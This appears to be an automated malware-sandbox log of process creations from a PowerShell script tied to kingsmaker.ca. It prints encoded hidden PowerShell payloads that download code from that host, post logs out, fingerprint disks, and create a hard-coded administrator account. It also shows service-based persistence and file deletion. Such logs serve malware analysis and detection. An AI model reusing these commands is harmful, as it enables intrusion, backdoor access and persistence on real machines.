        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEED.tmp" "c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Company Booklet.pdf"
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2224 --field-trial-handle=1636,i,4139433032823036426,1260113175703247658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: unknownProcess created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
        Source: unknownProcess created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi7
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
        Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
